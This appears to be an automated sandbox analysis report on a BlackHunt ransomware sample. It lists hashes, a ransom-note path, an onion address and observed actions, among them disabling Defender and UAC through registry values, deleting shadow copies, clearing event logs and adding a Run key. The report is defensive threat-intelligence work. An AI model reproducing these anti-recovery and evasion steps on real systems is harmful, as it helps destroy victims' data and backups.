Analysis
-
max time kernel
129s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:12
Static task
static1
Behavioral task
behavioral1
Sample
946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe
Resource
win10v2004-20231222-en
General
-
Target
946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe
-
Size
707KB
-
MD5
225c1891d807faae84ac3b9546a0b526
-
SHA1
028134bf910cfd0cdb18a327c49bfc3dcec96e4d
-
SHA256
946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b
-
SHA512
749f9b26d415fdec0950f933236b31cc8b8354c6757d5fff06a3247a566e4306e7fca6d7c6ef802eb84409ec641a36d021e9047c976e53205f95ce6afce5d4ec
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1G8fvnh:6uaTmkZJ+naie5OTamgEoKxLW93h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 9436 fsutil.exe 7428 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 13796 wevtutil.exe 17832 wevtutil.exe 17748 wevtutil.exe 17644 wevtutil.exe 9884 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9288 bcdedit.exe 10308 bcdedit.exe 5844 bcdedit.exe 10160 bcdedit.exe -
Renames multiple (3328) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 12476 wbadmin.exe 18388 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\K: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\S: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\V: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\B: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\M: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\R: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\U: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\Z: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\J: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\L: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\N: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\W: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\O: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\A: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\G: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\E: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\T: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\Y: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened (read-only) \??\P: 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\he-il\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\cacerts 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ar-ae\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_selectlist_checkmark_18.svg 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\default.jfc 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\#BlackHunt_Private.key 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-sl\#BlackHunt_ReadMe.hta 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#BlackHunt_ReadMe.txt 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\DismountResolve.M2TS 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_ko.properties 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 17576 17692 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 11236 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11712 vssadmin.exe 5884 vssadmin.exe 6188 vssadmin.exe 9392 vssadmin.exe 13680 vssadmin.exe 18080 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7244 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7988 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeRestorePrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeBackupPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeTakeOwnershipPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeAuditPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeSecurityPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeIncBasePriorityPrivilege 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Token: SeBackupPrivilege 10772 vssvc.exe Token: SeRestorePrivilege 10772 vssvc.exe Token: SeAuditPrivilege 10772 vssvc.exe Token: SeBackupPrivilege 12192 wbengine.exe Token: SeRestorePrivilege 12192 wbengine.exe Token: SeSecurityPrivilege 12192 wbengine.exe Token: SeSecurityPrivilege 17832 wevtutil.exe Token: SeBackupPrivilege 17832 wevtutil.exe Token: SeSecurityPrivilege 17748 wevtutil.exe Token: SeBackupPrivilege 17748 wevtutil.exe Token: SeSecurityPrivilege 17644 wevtutil.exe Token: SeBackupPrivilege 17644 wevtutil.exe Token: SeSecurityPrivilege 9884 wevtutil.exe Token: SeBackupPrivilege 9884 wevtutil.exe Token: SeSecurityPrivilege 13796 wevtutil.exe Token: SeBackupPrivilege 13796 wevtutil.exe Token: SeDebugPrivilege 7244 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5000 wrote to memory of 1580 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 93 PID 5000 wrote to memory of 1580 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 93 PID 5000 wrote to memory of 1908 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 95 PID 5000 wrote to memory of 1908 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 95 PID 5000 wrote to memory of 4612 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 96 PID 5000 wrote to memory of 4612 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 96 PID 5000 wrote to memory of 4728 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 98 PID 5000 wrote to memory of 4728 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 98 PID 5000 wrote to memory of 4684 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 100 PID 5000 wrote to memory of 4684 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 100 PID 5000 wrote to memory of 868 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 104 PID 5000 wrote to memory of 868 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 104 PID 5000 wrote to memory of 2672 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 103 PID 5000 wrote to memory of 2672 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 103 PID 5000 wrote to memory of 876 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 107 PID 5000 wrote to memory of 876 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 107 PID 5000 wrote to memory of 740 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 108 PID 5000 wrote to memory of 740 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 108 PID 5000 wrote to memory of 3372 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 110 PID 5000 wrote to memory of 3372 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 110 PID 5000 wrote to memory of 4408 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 112 PID 5000 wrote to memory of 4408 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 112 PID 5000 wrote to memory of 312 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 115 PID 5000 wrote to memory of 312 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 115 PID 5000 wrote to memory of 4400 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 133 PID 5000 wrote to memory of 4400 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 133 PID 5000 wrote to memory of 1856 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 132 